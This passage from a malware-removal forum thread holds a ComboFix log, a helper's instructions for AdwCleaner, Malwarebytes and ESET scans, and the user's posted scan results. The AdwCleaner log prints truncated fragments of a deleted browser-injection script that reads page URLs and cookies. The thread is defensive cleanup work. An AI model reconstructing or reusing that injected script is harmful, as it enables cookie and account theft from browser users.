2015-08-25 18:46 . 2015-09-01 21:09    2627704    ----a-w-    c:\windows\SysWow64\nvcuvid.dll
2015-08-25 18:46 . 2015-09-01 21:09    22525560    ----a-w-    c:\windows\system32\nvoglv64.dll
2015-08-25 18:46 . 2015-09-01 21:09    1898288    ----a-w-    c:\windows\system32\nvdispco6435582.dll
2015-08-25 18:46 . 2015-09-01 21:09    18543736    ----a-w-    c:\windows\SysWow64\nvoglv32.dll
2015-08-25 18:46 . 2015-09-01 21:09    176904    ----a-w-    c:\windows\system32\nvinitx.dll
2015-08-25 18:46 . 2015-09-01 21:09    17082392    ----a-w-    c:\windows\system32\nvwgf2umx.dll
2015-08-25 18:46 . 2015-09-01 21:09    16637336    ----a-w-    c:\windows\system32\nvopencl.dll
2015-08-25 18:46 . 2015-09-01 21:09    1558648    ----a-w-    c:\windows\system32\nvdispgenco6435582.dll
2015-08-25 18:46 . 2015-09-01 21:09    155792    ----a-w-    c:\windows\SysWow64\nvinit.dll
2015-08-25 18:46 . 2015-09-01 21:09    15512888    ----a-w-    c:\windows\system32\nvd3dumx.dll
2015-08-25 18:46 . 2015-09-01 21:09    150832    ----a-w-    c:\windows\system32\nvoglshim64.dll
2015-08-25 18:46 . 2015-09-01 21:09    14936264    ----a-w-    c:\windows\system32\nvcuda.dll
2015-08-25 18:46 . 2015-09-01 21:09    14635792    ----a-w-    c:\windows\SysWow64\nvwgf2um.dll
2015-08-25 18:46 . 2015-09-01 21:09    13661160    ----a-w-    c:\windows\SysWow64\nvopencl.dll
2015-08-25 18:46 . 2015-09-01 21:09    128512    ----a-w-    c:\windows\SysWow64\nvoglshim32.dll
2015-08-25 18:46 . 2015-09-01 21:09    12515016    ----a-w-    c:\windows\SysWow64\nvd3dum.dll
2015-08-25 18:46 . 2015-09-01 21:09    12185152    ----a-w-    c:\windows\SysWow64\nvcuda.dll
2015-08-25 18:46 . 2015-09-01 21:09    11089200    ----a-w-    c:\windows\system32\drivers\nvlddmkm.sys
2015-08-25 18:46 . 2015-09-01 21:09    1106672    ----a-w-    c:\windows\system32\nvumdshimx.dll
2015-08-25 18:46 . 2015-09-01 21:09    1075320    ----a-w-    c:\windows\system32\NvFBC64.dll
2015-08-25 18:46 . 2015-09-01 21:09    1064752    ----a-w-    c:\windows\system32\NvIFR64.dll
2015-08-25 14:24 . 2015-09-01 21:11    937776    ----a-w-    c:\windows\system32\nvvsvc.exe
2015-08-25 14:24 . 2015-09-01 21:11    62584    ----a-w-    c:\windows\system32\nvshext.dll
2015-08-25 14:24 . 2015-09-01 21:11    385144    ----a-w-    c:\windows\system32\nvmctray.dll
2015-08-25 14:24 . 2015-09-01 21:11    3496752    ----a-w-    c:\windows\system32\nvsvc64.dll
2015-08-25 14:24 . 2015-09-01 21:11    2558584    ----a-w-    c:\windows\system32\nvsvcr.dll
2015-08-25 14:24 . 2015-09-01 21:11    6884984    ----a-w-    c:\windows\system32\nvcpl.dll
2015-08-25 14:08 . 2015-09-01 21:11    574072    ----a-w-    c:\windows\SysWow64\nvStreaming.exe
2015-08-25 12:35 . 2015-09-01 21:11    5165808    ----a-w-    c:\windows\system32\nvcoproc.bin
2015-08-21 16:28 . 2015-08-21 16:28    1194185    ----a-w-    c:\windows\unins000.exe
2015-08-11 04:52 . 2015-09-01 04:30    69416    ----a-w-    c:\windows\SysWow64\nvaudcap32v.dll
2015-08-11 04:52 . 2015-09-01 04:30    50472    ----a-w-    c:\windows\system32\drivers\nvvad64v.sys
2015-08-11 04:52 . 2015-08-26 23:31    72504    ----a-w-    c:\windows\system32\nvaudcap64v.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Steam"="e:\steam\steam.exe" [2015-10-08 2900560]
"Skype"="c:\program files (x86)\Skype\Phone\Skype.exe" [2015-07-29 53655680]
"CreativeTaskScheduler"="c:\program files (x86)\Creative\Shared Files\CTSched.exe" [2006-11-17 53341]
"Akamai NetSession Interface"="c:\users\Rainsford\AppData\Local\Akamai\netsession_win.exe" [2015-09-11 4691384]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"CTxfiHlp"="CTXFIHLP.EXE" [2014-03-01 24576]
"Corsair Utility Engine"="c:\program files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe" [2015-08-28 12844864]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 BRDriver64_1_3_3_E02B25FC;BRDriver64_1_3_3_E02B25FC;c:\programdata\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys;c:\programdata\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [x]
R3 Creative Audio Engine Licensing Service;Creative Audio Engine Licensing Service;c:\program files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe;c:\program files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [x]
R3 CT20XUT;CT20XUT;c:\windows\system32\drivers\CT20XUT.SYS;c:\windows\SYSNATIVE\drivers\CT20XUT.SYS [x]
R3 CTEXFIFX;CTEXFIFX;c:\windows\system32\drivers\CTEXFIFX.SYS;c:\windows\SYSNATIVE\drivers\CTEXFIFX.SYS [x]
R3 CTHWIUT;CTHWIUT;c:\windows\system32\drivers\CTHWIUT.SYS;c:\windows\SYSNATIVE\drivers\CTHWIUT.SYS [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys;c:\windows\SYSNATIVE\drivers\EagleX64.sys [x]
R3 EasyAntiCheat;EasyAntiCheat;c:\windows\system32\EasyAntiCheat.exe;c:\windows\SYSNATIVE\EasyAntiCheat.exe [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 npggsvc;nProtect GameGuard Service;c:\windows\system32\GameMon.des;c:\windows\SYSNATIVE\GameMon.des [x]
R3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\drivers\nusb3hub.sys;c:\windows\SYSNATIVE\drivers\nusb3hub.sys [x]
R3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\drivers\nusb3xhc.sys;c:\windows\SYSNATIVE\drivers\nusb3xhc.sys [x]
R3 Point64;Microsoft Mouse and Keyboard Center Filter Driver;c:\windows\system32\DRIVERS\point64.sys;c:\windows\SYSNATIVE\DRIVERS\point64.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 rzudd;Razer Mouse Driver;c:\windows\system32\DRIVERS\rzudd.sys;c:\windows\SYSNATIVE\DRIVERS\rzudd.sys [x]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys;c:\windows\SYSNATIVE\drivers\synth3dvsc.sys [x]
R3 terminpt;Microsoft Remote Desktop Input Driver;c:\windows\system32\drivers\terminpt.sys;c:\windows\SYSNATIVE\drivers\terminpt.sys [x]
R3 TRIDCap;AVerMedia service;c:\windows\system32\DRIVERS\AVerTM62_x64.sys;c:\windows\SYSNATIVE\DRIVERS\AVerTM62_x64.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys;c:\windows\SYSNATIVE\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys;c:\windows\SYSNATIVE\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 X6va012;X6va012;c:\windows\SysWOW64\Drivers\X6va012;c:\windows\SysWOW64\Drivers\X6va012 [x]
R3 xhunter1;xhunter1;c:\windows\xhunter1.sys;c:\windows\xhunter1.sys [x]
R3 XSplit_Dummy;XSplit  Stream  Audio  Renderer;c:\windows\system32\drivers\xspltspk.sys;c:\windows\SYSNATIVE\drivers\xspltspk.sys [x]
R4 BEService;BattlEye Service;c:\program files (x86)\Common Files\BattlEye\BEService.exe;c:\program files (x86)\Common Files\BattlEye\BEService.exe [x]
R4 GalaxyClientService;GalaxyClientService;c:\program files (x86)\GalaxyClient\GalaxyClientService.exe;c:\program files (x86)\GalaxyClient\GalaxyClientService.exe [x]
R4 GalaxyCommunication;GalaxyCommunication;c:\programdata\GOG.com\Galaxy\redists\GalaxyCommunication.exe;c:\programdata\GOG.com\Galaxy\redists\GalaxyCommunication.exe [x]
R4 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
R4 Origin Client Service;Origin Client Service;c:\program files (x86)\Origin\OriginClientService.exe;c:\program files (x86)\Origin\OriginClientService.exe [x]
S2 AlienFusionService;Alienware Fusion Service;c:\program files\Alienware\Command Center\AlienFusionService.exe;c:\program files\Alienware\Command Center\AlienFusionService.exe [x]
S2 GfExperienceService;NVIDIA GeForce Experience Service;c:\program files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe;c:\program files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [x]
S2 NvNetworkService;NVIDIA Network Service;c:\program files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe;c:\program files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [x]
S2 NvStreamSvc;NVIDIA Streamer Service;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [x]
S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [x]
S3 AWOPFilterDriver;AWOPFilterDriver;c:\windows\system32\drivers\AWOPFilterDriver.sys;c:\windows\SYSNATIVE\drivers\AWOPFilterDriver.sys [x]
S3 CorsairVBusDriver;Corsair Bus;c:\windows\system32\DRIVERS\CorsairVBusDriver.sys;c:\windows\SYSNATIVE\DRIVERS\CorsairVBusDriver.sys [x]
S3 CorsairVHidDriver;Corsair virtual device;c:\windows\system32\DRIVERS\CorsairVHidDriver.sys;c:\windows\SYSNATIVE\DRIVERS\CorsairVHidDriver.sys [x]
S3 CT20XUT.SYS;CT20XUT.SYS;c:\windows\System32\drivers\CT20XUT.SYS;c:\windows\SYSNATIVE\drivers\CT20XUT.SYS [x]
S3 CTEXFIFX.SYS;CTEXFIFX.SYS;c:\windows\System32\drivers\CTEXFIFX.SYS;c:\windows\SYSNATIVE\drivers\CTEXFIFX.SYS [x]
S3 CTHWIUT.SYS;CTHWIUT.SYS;c:\windows\System32\drivers\CTHWIUT.SYS;c:\windows\SYSNATIVE\drivers\CTHWIUT.SYS [x]
S3 ha20x22k;Creative 20X2 HAL Driver;c:\windows\system32\drivers\ha20x22k.sys;c:\windows\SYSNATIVE\drivers\ha20x22k.sys [x]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\DRIVERS\k57nd60a.sys;c:\windows\SYSNATIVE\DRIVERS\k57nd60a.sys [x]
S3 LVRS64;Logitech RightSound Filter Driver;c:\windows\system32\DRIVERS\lvrs64.sys;c:\windows\SYSNATIVE\DRIVERS\lvrs64.sys [x]
S3 LVUVC64;Logitech HD Webcam C270(UVC);c:\windows\system32\DRIVERS\lvuvc64.sys;c:\windows\SYSNATIVE\DRIVERS\lvuvc64.sys [x]
S3 mio;Master IO Filter Driver;c:\windows\system32\DRIVERS\mio.sys;c:\windows\SYSNATIVE\DRIVERS\mio.sys [x]
S3 NvStreamKms;NvStreamKms;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [x]
S3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);c:\windows\system32\drivers\nvvad64v.sys;c:\windows\SYSNATIVE\drivers\nvvad64v.sys [x]
S3 Phosgene;FaceRig Virtual Camera;c:\windows\system32\DRIVERS\Phosgene.sys;c:\windows\SYSNATIVE\DRIVERS\Phosgene.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - 14659178
*Deregistered* - 14659178
.
Contents of the 'Scheduled Tasks' folder
.
2015-10-11 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-11-11 21:24]
.
2015-10-11 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-11-11 21:24]
.
2015-10-10 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core.job
- c:\users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [2014-06-15 21:21]
.
2015-10-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA.job
- c:\users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [2014-06-15 21:21]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 1331288]
"Command Center Controllers"="c:\program files\Alienware\Command Center\AWCCStartupOrchestrator.exe" [2012-06-18 12656]
"NvBackend"="c:\program files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe" [2015-08-27 2634872]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = <local>
TCP: DhcpNameServer = 192.168.1.254
FF - ProfilePath - c:\users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\
FF - user.js: general.useragent.extra.brc -
.
- - - - ORPHANS REMOVED - - - -
.
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\npggsvc]
"ImagePath"="c:\windows\system32\GameMon.des -service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\X6va012]
"ImagePath"="\??\c:\windows\SysWOW64\Drivers\X6va012"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_235_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_235_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_235.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.11"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_235.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_235.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_235.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2015-10-11  10:00:52
ComboFix-quarantined-files.txt  2015-10-11 15:00
.
Pre-Run: 395,795,238,912 bytes free
Post-Run: 395,913,523,200 bytes free
.
- - End Of File - - 10F659E74858BF9751484A55B60B49E0
A36C5E4F47E84449FF07ED3517B43A31
 



#8 deeprybka


Posted 11 October 2015 - 10:07 AM

Ok, and now the standard scans:

Step 1

Please download AdwCleaner (by Xplode) and save it to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select "Run As Administrator"
  • Click on the Scan button.
  • After the scan has finished, click on the Cleaning button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • After rebooting, a logfile report (AdwCleaner[C#].txt) will open automatically (where the largest value of # represents the most recent report).
    Copy and paste the contents of that logfile in your next reply.
Step 2


Scan with Malwarebytes Anti-Malware.
  • Please open Malwarebytes Anti-Malware and update the database.
  • Click "Settings" [1] and go to "Detection and Protection" [2]
  • Make sure "Scan for Rootkits" is checked.
  • Click on Dashboard [3], then click on Scan Now [4] to start the scan.
    If Malware or Potentially Unwanted Programs [PUPs] are found, you will receive a prompt:
    [image: m21p.png]
  • Click on "Remove Selected" [5].
  • Then click "Save Results" [6] and select
    [image: m21p4.png]
  • Return to our forum. Paste your log into your next reply and then click Finish [7].
[image: mbamv21.gif]

Step 3

Please download ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start [image: installer.png] with administrator privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Choose the following settings:
[image: settings.png]
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed, click on Finish.
  • A log file [image: log.png] is created at [image: logpath.png]
    Copy and paste the content of this log file in your next reply.
[image: esetlog.png]

Note: Do not forget to re-enable your antivirus application after running the above scan!
[image: eset.gif]
regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 

#9 Rainsford


Posted 11 October 2015 - 11:44 AM

Alright, here are two logs of the first 2 I used. The third is still scanning and I have to go to work now but at 50% it says it has found 19 items. When it finishes do I clean it or post the log and await your instruction?

 

ADW CLEANER

 

# AdwCleaner v5.013 - Logfile created 11/10/2015 at 10:16:08
# Updated 09/10/2015 by Xplode
# Database : 2015-10-09.3 [Server]
# Operating system : Windows 7 Ultimate Service Pack 1 (x64)
# Username : Rainsford - PHOTON
# Running from : C:\Users\Rainsford\Desktop\AdwCleaner.exe
# Option : Cleaning
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\ProgramData\62fa9ad6afe160d7
[-] Folder Deleted : C:\Users\Rainsford\AppData\Local\torch

***** [ Files ] *****

[-] File Deleted : C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\user.js

***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3D0F43D9-C1D7-733C-01F8-4A3001BF8CC3}

***** [ Web browsers ] *****

[-] [C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.JOItLA.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"txtlnkusaolp00000800\")>-1url.indexOf(\"sumo[...]
[-] [C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.mrapmA.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"txtlnkusaolp00000800\")>-1url.indexOf(\"sumo[...]
[-] [C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com

*************************

:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [1854 bytes] ##########

 

MALWAREBYTES

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/11/2015
Scan Time: 10:20 AM
Logfile:
Administrator: Yes

Version: 2.1.8.1057
Malware Database: v2015.10.11.04
Rootkit Database: v2015.10.06.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Rainsford

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 412437
Time Elapsed: 10 min, 46 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)



#10 deeprybka


Posted 11 October 2015 - 11:57 AM

When it finishes do I clean it or post the log and await your instruction?


Please follow the instructions.

BTW: Rootkit-Search during the MBAM-Scan wasn't enabled as well. :)
regards,
deeprybka

#11 Rainsford


Posted 11 October 2015 - 06:34 PM

AH, my deepest apologies, I thought I clicked the rootkit option. Here is the updated malwarebytes scan as well as the ESET one.

 

MalwareBytes

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/11/2015
Scan Time: 6:22 PM
Logfile:
Administrator: Yes

Version: 2.1.8.1057
Malware Database: v2015.10.11.05
Rootkit Database: v2015.10.06.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Rainsford

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 413478
Time Elapsed: 11 min, 50 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

 

ESET

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=a31213e4db68704491fa39552c9959af
# end=init
# utc_time=2015-10-11 03:32:10
# local_time=2015-10-11 10:32:10 (-0600, Central Daylight Time)
# country="United States"
# osver=6.1.7601 NT Service Pack 1
Update Init
Update Download
Update Finalize
Updated modules version: 26183
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=a31213e4db68704491fa39552c9959af
# end=updated
# utc_time=2015-10-11 03:34:33
# local_time=2015-10-11 10:34:33 (-0600, Central Daylight Time)
# country="United States"
# osver=6.1.7601 NT Service Pack 1
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=a31213e4db68704491fa39552c9959af
# engine=26183
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2015-10-11 05:17:36
# local_time=2015-10-11 12:17:36 (-0600, Central Daylight Time)
# country="United States"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='Microsoft Security Essentials'
# compatibility_mode=5895 16777213 100 100 24338261 85785572 0 0
# scanned=352015
# found=19
# cleaned=0
# scan_time=6182
